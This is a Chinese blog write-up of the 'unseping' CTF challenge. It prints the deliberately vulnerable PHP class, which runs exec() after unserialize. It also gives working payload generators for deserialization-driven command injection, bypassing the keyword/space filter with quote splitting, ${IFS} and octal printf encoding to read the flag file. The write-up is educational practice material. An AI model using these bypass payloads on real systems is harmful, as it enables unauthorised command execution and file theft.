攻防世界新手练习区——unseping

已于 2022-12-21 19:59:41 修改
阅读量4.1k 收藏 23
点赞数 13
分类专栏: Ctf刷题 文章标签: php ctf 网络安全
于 2022-12-21 18:51:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65049289/article/details/128395834
版权

目录

知识点

解读题目源码:

 命令绕过

知识点

  • PHP代码审计
  • PHP序列化和反序列化
  • PHP中魔术方法
  • 命令执行绕过方式

解读题目源码:

这道题首先一上来就是一段PHP代码,其中看到unserialize()就知道考的是反序列化,但是我们再往上看代码会发现还有命令执行绕过的知识点。做出这道题的第一步就是能够理清代码执行顺序和各个函数的功能。接下来我们先分析一下源码。

<?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
  • __construct():这是一个构造函数,在实例化一个对象的时候,首先会去自动执行的一个方法。
  • __destruct():这是一个析构函数,在对象的所有引用被删除或者当对象被显示销毁执行的魔术方法。注意:在实例化对象后,代码运行完全销毁,会触发析构函数__destruct();反序列化得到的是对象,用完之后会销毁,触发析构函数。这道题中发序列化之后就会触发析构函数
  • in_array()函数:

  • call_user_func_array()函数:

  •  exec()函数

  •  var_dump():用于输出变量的详细信息,包括值和类型等
  • preg_match_all():用于执行一个全局正则表达式匹配

  •  __wakeup()函数:

    unserialize()会检查是否存在一个__wakeup()方法。如果存在,则会先调用__wakeup()方法,预先准备对象需要的资源。

    预先准对象资源,返回void,常用于反序列化操作中重新建立数据库连接或执行其他初始化操作。

  • foreach()函数:

 执行顺序:

  1. 以POST方式提交ctf
  2. 对提交的值进行base64解码
  3. 进行反序列化
  4. 然后执行__wakeup()函数
  5. 执行析构函数_destruct()

能够看懂代码之后我们就可以开始进行尝试。由于我们是需要查看当前目录,寻找一下是否有flag的文件提示,但是有一个waf函数进行过滤,所以我们不能直接传参为ls。这就需要我们的命令执行绕过方式了。

我们可以检验上面我们的思路是否正确。

<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}

$o=new ease("ping",array("ifconfig"));
$s = serialize($o);
echo base64_encode($s);
?>

将上述代码结果以post形式提交进去。

这时候我们发现页面返回了结果:

这就说明我们整体思路是没有问题的,直接使用命令绕过方法寻找Flag。

 命令绕过

上面检验命令是可以执行的,我们接下来思路就放在命令执行绕过过滤即可,寻找flag线索。

  • 单引号
  • 双引号
  • ${Z}

<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}

$o=new ease("ping",array('l""s'));
$s = serialize($o);
echo base64_encode($s);
?>

 将上述结果提交。

看到了"flag_1s_here”文件夹,于是我们查看一下该文件夹下目录;于是执行命令"ls flag_1s_here";此处空格用${IFS}绕过。 

<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}

$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$s = serialize($o);
echo base64_encode($s);
?>

于是我们通过命令查看该文件;命令cat flag_1s_here/flag_831b69012c67b35f.php。

/绕过方式:利用oct编码(八进制)绕过;$(printf "\154\163")//ls命令

通过python脚本实现oct绕过:

str1 = "cat flag_1s_here/flag_831b69012c67b35f.php"
arr = []
for i in str1:
    #对字符先转换为ASCII码,再转换为八进制
    r = oct(ord(i))
    #这个主要是为了将八进制前面的0o替换掉
    r=str(r).replace("0o","")
    arr.append(r)
s = "\\"
# print(arr)
#将所有的八进制组合,最终的结果第一个地方应该再添加一个\
p=s.join(arr)
print(p)

将其结果带入命令那执行,代码如下:

<?php
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
     
}
$o=new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$s = serialize($o);

echo base64_encode($s);
?>

代入显示Flag:

 

凌晨四点半sec
关注
专栏目录
攻防世界web新手练习unseping
JIN_7X的博客
09-26 4648
这是新手第一题?不敢想象后边的题是什么样
攻防世界--unseping(反序列化)
m0_67467924的博客
05-22 500
注意,这个变量中,查看文件目录必须使用单引号表示字符串,因为变量序列化后的值是使用的",如果我们也使用双引号,那么序列化后的内容会改变,传输参数后会得到一个空值。查看flag_1s_here文件夹下的内容,注意这里的空格需要使用。均访问失败,查看别人的wp,发现使用otc也就是八进制进行命令执行的绕过。代码审计后,可以知道,我们需要传输ctf的值,然后达到命令执行的效果。\在ascii表中的十进制是47,转为八进制数便是57,因此这里的printf${IFS}"\57"表示的其实就是\。
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 421
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
攻防世界WEB(新手模式)10-disabled_button
最新发布
你好
07-21 209
那么我们只需要删除这个属性就ok(把disabled这几个字母删除就ok,双击这个单词然后就可以删除了)点击f12查看,发现input被设置成了disabled属性。接下来回到题目,发现按钮可以点击了,直接出flag。点进去之后,确实诶,有个按钮但是点不动。题目给的提示:前端、按钮。
【愚公系列】2023年05月 攻防世界-Web(unseping
时光隧道
05-25 9973
反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中。反序列化是将已序列化数据还原回对象的过程。攻击者可以通过构造恶意序列化数据来利用反序列化漏洞,从而在受害者的系统上执行任意代码或者进行远程攻击。攻击者可以通过修改序列化数据中的类名来指定一个恶意的类,该类将在反序列化过程中被实例化并执行其中的代码。攻击者还可以利用在对象反序列化期间执行的构造函数或readObject()方法中的任意代码执行漏洞,来进行恶意代码执行。
攻防世界unseping
m0_74979597的博客
09-07 551
表示easeargs属性的值为一个数组,其中1表示数组元素的数量,i:0表示数组的索引为0,s:2:""表示数组的值为"",0表示值的长度。这里很特殊,又不是写一些特殊字符,让它错误的认为代码,或构成新代码来进行绕过,它只是一种与字符串比较进行匹配,只要没有包含。命令与文件之间有空格,怎么办,用${IFS} 这是特殊的环境变量,在Unix/linux 用来字段分割符;O:4:"ease":2: 类名为ease的对象,4表示类名的长度,2表示对象属性的数量。2.绕过简单的防火墙,用“”,‘’,
攻防世界unseping
qq_63761746的博客
03-20 968
攻防世界unseping详细解读
攻防世界-unseping
m0_49025459的博客
12-17 2893
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
攻防世界PWN新手练习——cgpwn2
smsyz2019的博客
09-23 312
攻防世界PWN新手练习——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
攻防世界pwn新手练习——level0
smsyz2019的博客
10-31 1674
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界reverse新手——simple-unpack(upx脱壳)
m0_46357566的博客
07-18 1033
方法一:傻瓜式 下载文件,用记事本打开,按Ctrl+f打开搜索,输入flag,得到 去掉乱码即为flag 方法二…UPX脱壳 1.下载文件,拖进PEiD 不是有效的PE文件,就要怀疑是不是ELF文件了 2.再拖进exeinfope看 可以看到确实是ELF文件,然后是UPX加壳 3.下载kali Linux系统镜像(官网),新建VMware虚拟机(其实用脱壳机就可以,还是想手脱试试看) ...
攻防世界题目练习——Crypto密码新手+引导模式(一),2024年最新一线互联网架构师设计思想解读开源框架
2301_79054215的博客
04-20 977
题目名字Caesar就是恺撒密码,也就是把每个字母移动相同的位数变成另一个字母,观察比较cyberpeace和oknqdbqmoq也看得出,字母相同的位置变化后的字母也相同,于是数一下移动的位数。而RSA的安全性就在于大数n的不可分解性,一个很大的数n是很难在现有条件下分解成两个素数p、q的乘积的,因此想要破解出私钥d的值是很难的,也就很难被解密。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
攻防世界unseping (反序列化与Linux bash shell)
2302_79800344的博客
04-01 1447
【代码】【攻防世界unseping (反序列化与Linux bash shell)
攻防世界 notsequence
Bsecure的博客
05-02 316
notsequence 自己算法太菜了, 这道题的2个函数始终没看懂… 看了writeup, 杨辉三角形! 看了writeup, 自己慢慢的分析了下. 首先, check1函数. 然后是check2. 经过这2个函数判断, 就能知道是否是杨辉三角形了. 把前20行的数据经过md5加密就是flag. 最后, 题自己虽然每做出来, 倒是通过这个题重新认识了杨辉三角形. ...
攻防世界 unfinish
CyhDl666的博客
02-25 525
题目描述:sql注入 访问进去是个登录页面 dirsearch扫描了一下 访问register.php 注册了个账号 登录进去好像没什么用 返回登录页面 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究 二次注入 这里注入的点应该是在register.php页面中的name中 因为邮箱和密码还需要登录时候使用 具体可以看我前面的文章 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学.
攻防世界 unseping
10-20
攻防世界Wire1杂项题目中的unseping是一个反序列化漏洞利用题目。在这个题目中,用户可以通过POST请求传递一个经过base64编码和序列化的数据,然后在服务器端进行反序列化操作。攻击者可以构造一个恶意的序列化数据,使得服务器在反序列化时执行恶意代码,从而达到攻击的目的。在这个题目中,攻击者构造了一个类对象,其中包含了一个ping方法,该方法可以执行ping命令。攻击者通过构造恶意参数,使得服务器在执行ping命令时执行了恶意代码,从而达到攻击的目的。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凌晨四点半sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值